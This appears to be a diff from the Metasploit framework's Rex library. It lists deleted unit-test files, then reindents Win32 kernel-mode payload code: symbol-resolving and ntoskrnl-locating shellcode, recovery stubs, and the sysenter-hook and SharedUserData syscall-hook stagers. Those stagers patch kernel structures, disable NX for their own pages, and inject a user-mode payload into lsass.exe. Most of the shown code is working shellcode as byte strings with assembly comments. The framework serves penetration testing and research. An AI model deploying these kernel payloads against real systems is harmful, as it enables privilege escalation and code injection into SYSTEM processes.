- data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -42
- data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -57
- data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -16
- data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -47
- data/lib/rex/proto/drda.rb.ts.rb +0 -18
- data/lib/rex/proto/drda/constants.rb.ut.rb +0 -24
- data/lib/rex/proto/drda/packet.rb.ut.rb +0 -110
- data/lib/rex/proto/drda/utils.rb.ut.rb +0 -85
- data/lib/rex/proto/http.rb.ts.rb +0 -13
- data/lib/rex/proto/http/client.rb.ut.rb +0 -96
- data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -22
- data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -1
- data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -25
- data/lib/rex/proto/http/header.rb.ut.rb +0 -47
- data/lib/rex/proto/http/packet.rb.ut.rb +0 -166
- data/lib/rex/proto/http/request.rb.ut.rb +0 -215
- data/lib/rex/proto/http/response.rb.ut.rb +0 -150
- data/lib/rex/proto/http/server.rb.ut.rb +0 -80
- data/lib/rex/proto/ntlm.rb.ut.rb +0 -181
- data/lib/rex/proto/rfb.rb.ut.rb +0 -40
- data/lib/rex/proto/smb.rb.ts.rb +0 -9
- data/lib/rex/proto/smb/client.rb.ut.rb +0 -224
- data/lib/rex/proto/smb/constants.rb.ut.rb +0 -19
- data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -129
- data/lib/rex/proto/smb/utils.rb.ut.rb +0 -21
- data/lib/rex/proto/tftp/server.rb.ut.rb +0 -29
- data/lib/rex/service_manager.rb.ut.rb +0 -33
- data/lib/rex/socket.rb.ut.rb +0 -108
- data/lib/rex/socket/comm/local.rb.ut.rb +0 -76
- data/lib/rex/socket/parameters.rb.ut.rb +0 -52
- data/lib/rex/socket/range_walker.rb.ut.rb +0 -56
- data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -40
- data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -62
- data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -29
- data/lib/rex/socket/switch_board.rb.ut.rb +0 -53
- data/lib/rex/socket/tcp.rb.ut.rb +0 -65
- data/lib/rex/socket/tcp_server.rb.ut.rb +0 -45
- data/lib/rex/socket/udp.rb.ut.rb +0 -45
- data/lib/rex/test.rb +0 -36
- data/lib/rex/text.rb.ut.rb +0 -193
- data/lib/rex/transformer.rb.ut.rb +0 -39
- data/lib/rex/ui/text/color.rb.ut.rb +0 -19
- data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -35
- data/lib/rex/ui/text/table.rb.ut.rb +0 -56
|
@@ -5,20 +5,20 @@ module Win32
|
|
|
5
5
|
|
|
6
6
|
module Common
|
|
7
7
|
|
|
8
|
-
|
|
9
|
-
|
|
10
|
-
|
|
11
|
-
|
|
12
|
-
|
|
13
|
-
|
|
14
|
-
|
|
15
|
-
|
|
16
|
-
|
|
17
|
-
|
|
18
|
-
|
|
19
|
-
|
|
20
|
-
|
|
21
|
-
|
|
8
|
+
#
|
|
9
|
+
# Returns a stub that resolves the location of a symbol and then
|
|
10
|
+
# calls it. Refer to the following link for more details:
|
|
11
|
+
#
|
|
12
|
+
# http://uninformed.org/index.cgi?v=3&a=4&p=10
|
|
13
|
+
#
|
|
14
|
+
def self.resolve_call_sym
|
|
15
|
+
"\x60\x31\xc9\x8b\x7d\x3c\x8b\x7c\x3d\x78\x01\xef\x8b" +
|
|
16
|
+
"\x57\x20\x01\xea\x8b\x34\x8a\x01\xee\x31\xc0\x99\xac" +
|
|
17
|
+
"\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x41\x66\x39\xda" +
|
|
18
|
+
"\x75\xe3\x49\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b" +
|
|
19
|
+
"\x5f\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c" +
|
|
20
|
+
"\x61\xff\xe0"
|
|
21
|
+
end
|
|
22
22
|
|
|
23
23
|
end
|
|
24
24
|
|
|
@@ -10,42 +10,42 @@ require 'rex/payloads/win32/kernel/migration'
|
|
|
10
10
|
|
|
11
11
|
module Kernel
|
|
12
12
|
|
|
13
|
-
|
|
14
|
-
|
|
15
|
-
|
|
16
|
-
|
|
17
|
-
|
|
18
|
-
|
|
19
|
-
|
|
20
|
-
|
|
21
|
-
|
|
22
|
-
|
|
23
|
-
|
|
24
|
-
|
|
25
|
-
|
|
26
|
-
|
|
27
|
-
|
|
28
|
-
|
|
29
|
-
|
|
30
|
-
|
|
31
|
-
|
|
32
|
-
|
|
33
|
-
|
|
34
|
-
|
|
35
|
-
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
-
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
13
|
+
#
|
|
14
|
+
# Constructs a kernel-mode payload using the supplied options. The options
|
|
15
|
+
# can be:
|
|
16
|
+
#
|
|
17
|
+
# Recovery : The recovery method to use, such as 'spin'.
|
|
18
|
+
# Stager : The stager method to use, such as 'sud_syscall_hook'.
|
|
19
|
+
# RecoveryStub : The recovery stub that should be used, if any.
|
|
20
|
+
# UserModeStub : The user-mode payload to execute, if any.
|
|
21
|
+
# KernelModeStub: The kernel-mode payload to execute, if any.
|
|
22
|
+
#
|
|
23
|
+
def self.construct(opts = {})
|
|
24
|
+
payload = nil
|
|
25
|
+
|
|
26
|
+
# Generate the recovery stub
|
|
27
|
+
if opts['Recovery'] and Kernel::Recovery.respond_to?(opts['Recovery'])
|
|
28
|
+
opts['RecoveryStub'] = Kernel::Recovery.send(opts['Recovery'], opts)
|
|
29
|
+
end
|
|
30
|
+
|
|
31
|
+
# Append supplied recovery stub information in case there is some
|
|
32
|
+
# context specific recovery that must be done.
|
|
33
|
+
if opts['AppendRecoveryStub']
|
|
34
|
+
opts['RecoveryStub'] = (opts['RecoveryStub'] || '') + opts['AppendRecoveryStub']
|
|
35
|
+
end
|
|
36
|
+
|
|
37
|
+
# Generate the stager
|
|
38
|
+
if opts['Stager'] and Kernel::Stager.respond_to?(opts['Stager'])
|
|
39
|
+
payload = Kernel::Stager.send(opts['Stager'], opts)
|
|
40
|
+
# Or, generate the migrator
|
|
41
|
+
elsif opts['Migrator'] and Kernel::Migration.respond_to?(opts['Migrator'])
|
|
42
|
+
payload = Kernel::Migration.send(opts['Migrator'], opts)
|
|
43
|
+
else
|
|
44
|
+
raise ArgumentError, "A stager or a migrator must be specified."
|
|
45
|
+
end
|
|
46
|
+
|
|
47
|
+
payload
|
|
48
|
+
end
|
|
49
49
|
|
|
50
50
|
end
|
|
51
51
|
|
|
@@ -14,38 +14,38 @@ require 'rex/payloads/win32/common'
|
|
|
14
14
|
#
|
|
15
15
|
module Common
|
|
16
16
|
|
|
17
|
-
|
|
18
|
-
|
|
19
|
-
|
|
20
|
-
|
|
21
|
-
|
|
22
|
-
|
|
23
|
-
|
|
24
|
-
|
|
25
|
-
|
|
26
|
-
|
|
27
|
-
|
|
28
|
-
|
|
29
|
-
|
|
30
|
-
|
|
31
|
-
|
|
32
|
-
|
|
33
|
-
|
|
34
|
-
|
|
35
|
-
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
-
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
17
|
+
#
|
|
18
|
+
# Returns a stub that will find the base address of ntoskrnl and
|
|
19
|
+
# place it in eax. This method works by using an IDT entry. Credit
|
|
20
|
+
# to eEye.
|
|
21
|
+
#
|
|
22
|
+
def self.find_nt_idt_eeye
|
|
23
|
+
"\x8b\x35\x38\xf0\xdf\xff\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7"
|
|
24
|
+
end
|
|
25
|
+
|
|
26
|
+
#
|
|
27
|
+
# Returns a stub that will find the base address of ntoskrnl and
|
|
28
|
+
# place it in eax. This method uses a pointer found in KdVersionBlock.
|
|
29
|
+
#
|
|
30
|
+
def self.find_nt_kdversionblock
|
|
31
|
+
"\x31\xc0\x64\x8b\x40\x34\x8b\x40\x10"
|
|
32
|
+
end
|
|
33
|
+
|
|
34
|
+
#
|
|
35
|
+
# Returns a stub that will find the base address of ntoskrnl and
|
|
36
|
+
# place it in eax. This method uses a pointer found in the
|
|
37
|
+
# processor control region as a starting point.
|
|
38
|
+
#
|
|
39
|
+
def self.find_nt_pcr
|
|
40
|
+
"\xa1\x2c\xf1\xdf\xff\x66\x25\x01\xf0\x48\x66\x81\x38\x4d\x5a\x75\xf4"
|
|
41
|
+
end
|
|
42
|
+
|
|
43
|
+
#
|
|
44
|
+
# Alias for resolving symbols.
|
|
45
|
+
#
|
|
46
|
+
def self.resolve_call_sym
|
|
47
|
+
Rex::Payloads::Win32::Common.resolve_call_sym
|
|
48
|
+
end
|
|
49
49
|
|
|
50
50
|
end
|
|
51
51
|
|
|
@@ -12,36 +12,36 @@ module Kernel
|
|
|
12
12
|
#
|
|
13
13
|
module Recovery
|
|
14
14
|
|
|
15
|
-
|
|
16
|
-
|
|
17
|
-
|
|
18
|
-
|
|
19
|
-
|
|
20
|
-
|
|
15
|
+
#
|
|
16
|
+
# The default recovery method is to spin the thread
|
|
17
|
+
#
|
|
18
|
+
def self.default(opts = {})
|
|
19
|
+
spin(opts)
|
|
20
|
+
end
|
|
21
21
|
|
|
22
|
-
|
|
23
|
-
|
|
24
|
-
|
|
25
|
-
|
|
26
|
-
|
|
27
|
-
|
|
22
|
+
#
|
|
23
|
+
# Infinite 'hlt' loop.
|
|
24
|
+
#
|
|
25
|
+
def self.spin(opts = {})
|
|
26
|
+
"\xf4\xeb\xfd"
|
|
27
|
+
end
|
|
28
28
|
|
|
29
|
-
|
|
30
|
-
|
|
31
|
-
|
|
32
|
-
|
|
33
|
-
|
|
34
|
-
|
|
35
|
-
|
|
36
|
-
|
|
29
|
+
#
|
|
30
|
+
# Restarts the idle thread by jumping back to the entry point of
|
|
31
|
+
# KiIdleLoop. This requires a hard-coded address of KiIdleLoop.
|
|
32
|
+
# You can pass the 'KiIdleLoopAddress' in the options hash.
|
|
33
|
+
#
|
|
34
|
+
def self.idlethread_restart(opts = {})
|
|
35
|
+
# Default to fully patched XPSP2
|
|
36
|
+
opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil?
|
|
37
37
|
|
|
38
|
-
|
|
39
|
-
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
38
|
+
"\x31\xC0" + # xor eax,eax
|
|
39
|
+
"\x64\xC6\x40\x24\x02" + # mov byte [fs:eax+0x24],0x2
|
|
40
|
+
"\x8B\x1D\x1C\xF0\xDF\xFF" + # mov ebx,[0xffdff01c]
|
|
41
|
+
"\xB8" + [opts['KiIdleLoopAddress']].pack('V') + # mov eax, 0x804dbb27
|
|
42
|
+
"\x6A\x00" + # push byte +0x0
|
|
43
|
+
"\xFF\xE0" # jmp eax
|
|
44
|
+
end
|
|
45
45
|
|
|
46
46
|
end
|
|
47
47
|
|
|
@@ -12,179 +12,179 @@ module Kernel
|
|
|
12
12
|
#
|
|
13
13
|
module Stager
|
|
14
14
|
|
|
15
|
-
|
|
16
|
-
|
|
17
|
-
|
|
18
|
-
|
|
19
|
-
|
|
20
|
-
|
|
21
|
-
|
|
22
|
-
|
|
23
|
-
|
|
24
|
-
|
|
25
|
-
|
|
26
|
-
|
|
27
|
-
|
|
28
|
-
|
|
29
|
-
|
|
30
|
-
|
|
31
|
-
|
|
32
|
-
|
|
33
|
-
|
|
34
|
-
|
|
35
|
-
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
-
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
52
|
-
|
|
53
|
-
|
|
54
|
-
|
|
55
|
-
|
|
56
|
-
|
|
57
|
-
|
|
58
|
-
|
|
59
|
-
|
|
60
|
-
|
|
61
|
-
|
|
62
|
-
|
|
63
|
-
|
|
64
|
-
|
|
65
|
-
|
|
66
|
-
|
|
67
|
-
|
|
68
|
-
|
|
69
|
-
|
|
70
|
-
|
|
71
|
-
|
|
72
|
-
|
|
73
|
-
|
|
74
|
-
|
|
75
|
-
|
|
76
|
-
|
|
77
|
-
|
|
78
|
-
|
|
79
|
-
|
|
80
|
-
|
|
81
|
-
|
|
82
|
-
|
|
83
|
-
|
|
84
|
-
|
|
85
|
-
|
|
86
|
-
|
|
87
|
-
|
|
88
|
-
|
|
89
|
-
|
|
90
|
-
|
|
91
|
-
|
|
92
|
-
|
|
93
|
-
|
|
94
|
-
|
|
95
|
-
|
|
96
|
-
|
|
97
|
-
|
|
98
|
-
|
|
99
|
-
|
|
100
|
-
|
|
101
|
-
|
|
102
|
-
|
|
103
|
-
|
|
104
|
-
|
|
105
|
-
|
|
106
|
-
|
|
107
|
-
|
|
108
|
-
|
|
109
|
-
|
|
110
|
-
|
|
111
|
-
|
|
112
|
-
|
|
113
|
-
|
|
114
|
-
|
|
115
|
-
|
|
116
|
-
|
|
117
|
-
|
|
118
|
-
|
|
119
|
-
|
|
120
|
-
|
|
15
|
+
#
|
|
16
|
+
# Works on Vista, Server 2008 and 7.
|
|
17
|
+
#
|
|
18
|
+
# Full assembly source at:
|
|
19
|
+
# /msf3/external/source/shellcode/windows/x86/src/kernel/stager_sysenter_hook.asm
|
|
20
|
+
#
|
|
21
|
+
# This payload works as follows:
|
|
22
|
+
# * Our sysenter handler and ring3 stagers are copied over to safe location.
|
|
23
|
+
# * The SYSENTER_EIP_MSR is patched to point to our sysenter handler.
|
|
24
|
+
# * The ring0 thread we are in is placed in a halted state.
|
|
25
|
+
# * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control.
|
|
26
|
+
# * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met.
|
|
27
|
+
# * If NX is enabled we patch the respective page table entry to disable it for the ring3 code.
|
|
28
|
+
# * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager.
|
|
29
|
+
# * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called.
|
|
30
|
+
#
|
|
31
|
+
def self.stager_sysenter_hook( opts = {} )
|
|
32
|
+
|
|
33
|
+
# The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static).
|
|
34
|
+
pagetable = opts['StagerAddressPageTable'] || 0xC03FFF00
|
|
35
|
+
|
|
36
|
+
# The address in kernel memory where we place our ring0 and ring3 stager (no ASLR).
|
|
37
|
+
kstager = opts['StagerAddressKernel'] || 0xFFDF0400
|
|
38
|
+
|
|
39
|
+
# The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR).
|
|
40
|
+
ustager = opts['StagerAddressUser'] || 0x7FFE0400
|
|
41
|
+
|
|
42
|
+
# Target SYSTEM process to inject ring3 payload into.
|
|
43
|
+
process = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*')
|
|
44
|
+
|
|
45
|
+
# A simple hash of the process name based on the first 4 wide chars.
|
|
46
|
+
# Assumes process is located at '*:\windows\system32\'.
|
|
47
|
+
checksum = process[0] + ( process[2] << 8 ) + ( process[1] << 16 ) + ( process[3] << 24 )
|
|
48
|
+
|
|
49
|
+
# The ring0 -> ring3 payload blob.
|
|
50
|
+
r0 = "\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" +
|
|
51
|
+
"\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" +
|
|
52
|
+
"\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" +
|
|
53
|
+
"\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" +
|
|
54
|
+
"\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" +
|
|
55
|
+
"\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" +
|
|
56
|
+
"\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" +
|
|
57
|
+
"\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" +
|
|
58
|
+
"\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" +
|
|
59
|
+
"\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" +
|
|
60
|
+
"\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" +
|
|
61
|
+
"\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" +
|
|
62
|
+
"\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3"
|
|
63
|
+
|
|
64
|
+
# The ring3 payload.
|
|
65
|
+
r3 = ''
|
|
66
|
+
r3 += _createthread() if opts['CreateThread'] == true
|
|
67
|
+
r3 += opts['UserModeStub'] || ''
|
|
68
|
+
|
|
69
|
+
# Patch in the required values.
|
|
70
|
+
r0 = r0.gsub( [ 0x41414141 ].pack("V"), [ ( r0.length + r3.length - 0x1C ) ].pack("V") )
|
|
71
|
+
r0 = r0.gsub( [ 0x42424242 ].pack("V"), [ kstager ].pack("V") )
|
|
72
|
+
r0 = r0.gsub( [ 0x43434343 ].pack("V"), [ ustager ].pack("V") )
|
|
73
|
+
r0 = r0.gsub( [ 0x44444444 ].pack("V"), [ checksum ].pack("V") )
|
|
74
|
+
r0 = r0.gsub( [ 0x45454545 ].pack("V"), [ pagetable ].pack("V") )
|
|
75
|
+
|
|
76
|
+
# Return the ring0 -> ring3 payload blob with the real ring3 payload appended.
|
|
77
|
+
return r0 + r3
|
|
78
|
+
end
|
|
79
|
+
|
|
80
|
+
#
|
|
81
|
+
# XP SP2/2K3 SP1 ONLY
|
|
82
|
+
#
|
|
83
|
+
# Returns a kernel-mode stager that transitions from r0 to r3 by placing
|
|
84
|
+
# code in an unused portion of SharedUserData and then pointing the
|
|
85
|
+
# SystemCall attribute to that unused portion. This has the effect of
|
|
86
|
+
# causing the custom code to be called every time a user-mode process
|
|
87
|
+
# tries to make a system call. The returned payload also checks to make
|
|
88
|
+
# sure that it's running in the context of lsass before actually running
|
|
89
|
+
# the embedded payload.
|
|
90
|
+
#
|
|
91
|
+
def self.sud_syscall_hook(opts = {})
|
|
92
|
+
r0_recovery = opts['RecoveryStub'] || Recovery.default
|
|
93
|
+
r3_payload = opts['UserModeStub'] || ''
|
|
94
|
+
r3_prefix = _run_only_in_win32proc_stub("\xff\x25\x08\x03\xfe\x7f", opts)
|
|
95
|
+
r3_size = ((r3_prefix.length + r3_payload.length + 3) & ~0x3) / 4
|
|
96
|
+
|
|
97
|
+
r0_stager =
|
|
98
|
+
"\xEB" + [0x22 + r0_recovery.length].pack('C') + # jmp short 0x27
|
|
99
|
+
"\xBB\x01\x03\xDF\xFF" + # mov ebx,0xffdf0301
|
|
100
|
+
"\x4B" + # dec ebx
|
|
101
|
+
"\xFC" + # cld
|
|
102
|
+
"\x8D\x7B\x7C" + # lea edi,[ebx+0x7c]
|
|
103
|
+
"\x5E" + # pop esi
|
|
104
|
+
"\x6A" + [r3_size].pack('C') + # push byte num_dwords
|
|
105
|
+
"\x59" + # pop ecx
|
|
106
|
+
"\xF3\xA5" + # rep movsd
|
|
107
|
+
"\xBF\x7C\x03\xFE\x7F" + # mov edi,0x7ffe037c
|
|
108
|
+
"\x39\x3B" + # cmp [ebx],edi
|
|
109
|
+
"\x74\x09" + # jz
|
|
110
|
+
"\x8B\x03" + # mov eax,[ebx]
|
|
111
|
+
"\x8D\x4B\x08" + # lea ecx,[ebx+0x8]
|
|
112
|
+
"\x89\x01" + # mov [ecx],eax
|
|
113
|
+
"\x89\x3B" + # mov [ebx],edi
|
|
114
|
+
r0_recovery +
|
|
115
|
+
"\xe8" + [0xffffffd9 - r0_recovery.length].pack('V') + # call 0x2
|
|
116
|
+
r3_prefix +
|
|
117
|
+
r3_payload
|
|
118
|
+
|
|
119
|
+
return r0_stager
|
|
120
|
+
end
|
|
121
121
|
|
|
122
122
|
protected
|
|
123
123
|
|
|
124
|
-
|
|
125
|
-
|
|
126
|
-
|
|
127
|
-
|
|
128
|
-
|
|
129
|
-
|
|
130
|
-
|
|
131
|
-
|
|
132
|
-
|
|
133
|
-
|
|
134
|
-
|
|
135
|
-
|
|
136
|
-
|
|
137
|
-
|
|
138
|
-
|
|
139
|
-
|
|
140
|
-
|
|
141
|
-
|
|
142
|
-
|
|
143
|
-
|
|
144
|
-
|
|
145
|
-
|
|
146
|
-
|
|
147
|
-
|
|
148
|
-
|
|
149
|
-
|
|
150
|
-
|
|
151
|
-
|
|
152
|
-
|
|
153
|
-
|
|
154
|
-
|
|
155
|
-
|
|
156
|
-
|
|
157
|
-
|
|
158
|
-
|
|
159
|
-
|
|
160
|
-
|
|
161
|
-
|
|
162
|
-
|
|
163
|
-
|
|
164
|
-
|
|
165
|
-
|
|
166
|
-
|
|
167
|
-
|
|
168
|
-
|
|
169
|
-
|
|
170
|
-
|
|
171
|
-
|
|
172
|
-
|
|
173
|
-
|
|
174
|
-
|
|
175
|
-
|
|
176
|
-
|
|
177
|
-
|
|
178
|
-
|
|
179
|
-
|
|
180
|
-
|
|
181
|
-
|
|
182
|
-
|
|
183
|
-
|
|
184
|
-
|
|
185
|
-
|
|
186
|
-
|
|
187
|
-
|
|
124
|
+
#
|
|
125
|
+
# Stub to run a prepended ring3 payload in a new thread.
|
|
126
|
+
#
|
|
127
|
+
# Full assembly source at:
|
|
128
|
+
# /msf3/external/source/shellcode/windows/x86/src/single/createthread.asm
|
|
129
|
+
#
|
|
130
|
+
def self._createthread
|
|
131
|
+
r3 = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
|
132
|
+
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
|
133
|
+
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
|
134
|
+
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
|
135
|
+
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
|
136
|
+
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
|
137
|
+
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
|
138
|
+
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
|
139
|
+
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
|
140
|
+
"\x31\xC0\x50\x50\x50\x8D\x9D\xA0\x00\x00\x00\x53\x50\x50\x68\x38" +
|
|
141
|
+
"\x68\x0D\x16\xFF\xD5\xC3\x58"
|
|
142
|
+
return r3
|
|
143
|
+
end
|
|
144
|
+
|
|
145
|
+
#
|
|
146
|
+
# This stub is used by stagers to check to see if the code is
|
|
147
|
+
# running in the context of a user-mode system process. By default,
|
|
148
|
+
# this process is lsass.exe. If it isn't, it runs the code
|
|
149
|
+
# specified by append. Otherwise, it jumps past that code and
|
|
150
|
+
# into what should be the expected r3 payload to execute. This
|
|
151
|
+
# stub also makes sure that the payload does not run more than
|
|
152
|
+
# once.
|
|
153
|
+
#
|
|
154
|
+
def self._run_only_in_win32proc_stub(append = '', opts = {})
|
|
155
|
+
opts['RunInWin32Process'] = "lsass.exe" if opts['RunInWin32Process'].nil?
|
|
156
|
+
|
|
157
|
+
process = opts['RunInWin32Process'].downcase
|
|
158
|
+
checksum =
|
|
159
|
+
process[0] +
|
|
160
|
+
(process[2] << 8) +
|
|
161
|
+
(process[1] << 16) +
|
|
162
|
+
(process[3] << 24)
|
|
163
|
+
|
|
164
|
+
"\x60" + # pusha
|
|
165
|
+
"\x6A\x30" + # push byte +0x30
|
|
166
|
+
"\x58" + # pop eax
|
|
167
|
+
"\x99" + # cdq
|
|
168
|
+
"\x64\x8B\x18" + # mov ebx,[fs:eax]
|
|
169
|
+
"\x39\x53\x0C" + # cmp [ebx+0xc],edx
|
|
170
|
+
"\x74\x26" + # jz 0x5f
|
|
171
|
+
"\x8B\x5B\x10" + # mov ebx,[ebx+0x10]
|
|
172
|
+
"\x8B\x5B\x3C" + # mov ebx,[ebx+0x3c]
|
|
173
|
+
"\x83\xC3\x28" + # add ebx,byte +0x28
|
|
174
|
+
"\x8B\x0B" + # mov ecx,[ebx]
|
|
175
|
+
"\x03\x4B\x03" + # add ecx,[ebx+0x3]
|
|
176
|
+
"\x81\xF9" + [checksum].pack('V') + # cmp ecx,prochash
|
|
177
|
+
"\x75\x10" + # jnz 0x5f
|
|
178
|
+
"\x64\x8B\x18" + # mov ebx,[fs:eax]
|
|
179
|
+
"\x43" + # inc ebx
|
|
180
|
+
"\x43" + # inc ebx
|
|
181
|
+
"\x43" + # inc ebx
|
|
182
|
+
"\x80\x3B\x01" + # cmp byte [ebx],0x1
|
|
183
|
+
"\x74\x05" + # jz 0x5f
|
|
184
|
+
"\xC6\x03\x01" + # mov byte [ebx],0x1
|
|
185
|
+
"\xEB" + [append.length + 1].pack('C') + # jmp stager
|
|
186
|
+
"\x61" + append # restore regs
|
|
187
|
+
end
|
|
188
188
|
|
|
189
189
|
|
|
190
190
|
end
|